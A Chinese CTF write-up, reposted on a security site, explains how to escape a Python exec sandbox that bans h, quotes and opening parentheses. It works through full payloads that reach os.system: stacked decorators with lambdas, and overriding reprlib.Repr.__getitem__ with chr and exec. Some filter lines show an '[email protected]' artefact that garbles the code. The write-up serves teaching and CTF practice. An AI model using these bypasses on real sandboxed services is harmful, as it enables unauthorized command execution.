python受限的任意代码执行与黑魔法

admin 2022年1月20日02:35:46CTF专场评论26 views3431字阅读11分26秒阅读模式

0x00 起因

在NCTF/NJUPTCTF 2021中有一道misc题:

我们可爱的Hex酱又有了一个强大的功能可以去执行多行语句惹~
但是为了防止有些居心叵测的人我们专门把括号单双引号都过滤掉噢对不准色色所以也不准出现h哟~

Ubuntu Python3.6.9

快去找Hex酱(QQ:2821876761)私聊吧
附件

https://nctf.slight-wind.com/misc/hex/runner.py
https://attachment.h4ck.fun:9000/misc/hex/runner.py

其中附件内容如下:

import sys
from base64 import b64decode

code = sys.argv[1]

try:
    data = b64decode(code.encode()).decode()
except:
    exit(0)

for c in 'h"\'(':
    if c in data: exit(0)

exec(data)

这其实就是一个受限制的python代码执行,不能使用h,单引号,双引号,左括号字符。我们知道在SSTI中我们如果禁用了小括号的话是没办法任意命令执行的,但是在任意python代码执行的情况下还有转机吗?

0x01 正解: 装饰器

正解不是本篇文章主要讨论的内容,这里也介绍一下,其实就是python装饰器的技巧,一个简单的python装饰器如下:

def log(func):
    def wrapper(*args, **kw):
        print("here is a log")
        func()
    return wrapper


@log
def func():
    print("hello world")


func()

这里的@log实际上是一个语法糖,他等价于func=log(func),也就是说这里隐式包含了函数调用,同时装饰器是可以嵌套的,并且能够用于装饰类

但是这里我们依然用到了小括号,我们怎样才能避免这个情况呢?实际上是用到了python的(残废)匿名函数,一个简单的python匿名函数如下:

func = lambda _: "system" # 意思是无论传入什么参数最终都会返回system这个字符串
print(func("anything")) # system

所以我们可以使用嵌套的装饰器去调用os.system(), 例如:

from os import system
c = lambda _: "whoami"

@system
@c
class x:pass

实际上调用的是system(c(x)),而c函数不管传入什么都会返回"whoami"这个字符串,最终实现命令执行

这里还有最后一个问题是如何构造字符串,因为我们是没办法使用单引号或者双引号的,所以我们需要利用一些python原生的字符串,比如某些类的__doc__,比如字典(dict)的doc如下:

dict() -> new empty dictionary
dict(mapping) -> new dictionary initialized from a mapping object's
    (key, value) pairs
dict(iterable) -> new dictionary initialized as if via:
    d = {}
    for k, v in iterable:
        d[k] = v
dict(**kwargs) -> new dictionary initialized with the name=value pairs
    in the keyword argument list.  For example:  dict(one=1, two=2)

这里面基本上存在我们需要的英文字符,可以使用{}.__doc__[index]的形式获取字符串,所以最终的exp可以是:

from os import system
n = {}.__doc__
f = lambda _: n[2]+n[80]+n[55]+n[6]+n[75]+n[69]+n[80]+n[88]  # cat flag
@system
@f
class x:pass

0x02 寻找非预期

如果我们不使用装饰器的方法,这道题目还有做法吗?换句话说假如我们不允许代码中存在@这个字符,这道题还能够解吗?答案是肯定的。

所以我们的题目变成:

import sys
from base64 import b64decode

code = sys.argv[1]

try:
    data = b64decode(code.encode()).decode()
except:
    exit(0)

for c in '[email protected]"\'(':
    if c in data: exit(0)

exec(data)

这里我们重新思考一下,我们在没有小括号使用的情况下,还有什么能够使用呢?答案是中括号,我们知道,如果我们尝试使用中括号根据索引去获取对象时,实际上是调用了类中的__getitem__方法,一个简单的示例如下:

class C:
    def __getitem__(self, key):
        return str(key) + "111"

c = C()
print(c["qwe"])  # qwe-111

可以看到这里的__getitem__魔术方法是一个特殊的方法,当我们调用c["anything"]的是时候实际上调用了c.__getitem__("qwe"),这样我们即使没有小括号也能够进行函数调用。如果我们可以覆盖某些类的__getitem__方法为一些自带方法的话,我们就可以实现命令执行了。

失败的尝试: 覆盖自带类的__getitem__

我的第一个想法是覆盖python自带类的__getitem__方法,例如list或者dict,但是经过测试之后发现这是行不通的:

所以我们的目的就是要找到一个类能够覆盖其__getitem__并且能获取到这个类的实例,这里的重点是获取到类的实例,因为我们就算可以定义一个自定义的类,也无法获取这个类的实例,因为获取类的实例也需要小括号

成功的尝试: python标准库里的魔术

我们尝试从python标准库中找到一个符合我们标准的库,python的标准库参考这里

在一番寻找后,我们将目光投向reprlib这个库,它完美符合了我们的要求!
python受限的任意代码执行与黑魔法
一个简单的示例如下:

import reprlib
reprlib.Repr.__getitem__=exec
a=reprlib.aRepr
a["print('whoami')"]

所以我们最终的exp构造大致如下:
1. 从标准库中引入reprlib这个库
2. 覆盖reprlib.Repr__getitem__方法为chr方法
3. 通过reprlib.aRepr中括号调用构造任意字符串
4. 再次覆盖为exec方法
5. 真正意义上的python代码执行

这里需要注意的是由于h也被禁用了,所以我们没有办法直接reprlib.Repr.__getitem__=chr,需要走一下弯路,利用builtins库的__dict__再利用字典的__doc__,我们最终得到一个非常酷的exp如下:

data = """
import reprlib
import builtins
__=reprlib.aRepr
reprlib.Repr.__getitem__ = builtins.__dict__[{}.__doc__[2]+{}.__doc__[280]+{}.__doc__[28]]  # chr
exp=__[95]+__[95]+__[105]+__[109]+__[112]+__[111]+__[114]+__[116]+__[95]+__[95]+__[40]+__[39]+__[111]+__[115]+__[39]+__[41]+__[46]+__[115]+__[121]+__[115]+__[116]+__[101]+__[109]+__[40]+__[39]+__[119]+__[104]+__[111]+__[97]+__[109]+__[105]+__[39]+__[41] // __import__('os').system('whoami')
reprlib.Repr.__getitem__ = exec
reprlib.aRepr[exp]
"""

for c in '[email protected]"\'(':
    if c in data:
        print(c)
        exit(0)

exec(data)

FROM:tttang . com

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月20日02:35:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  python受限的任意代码执行与黑魔法 http://cn-sec.com/archives/744775.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: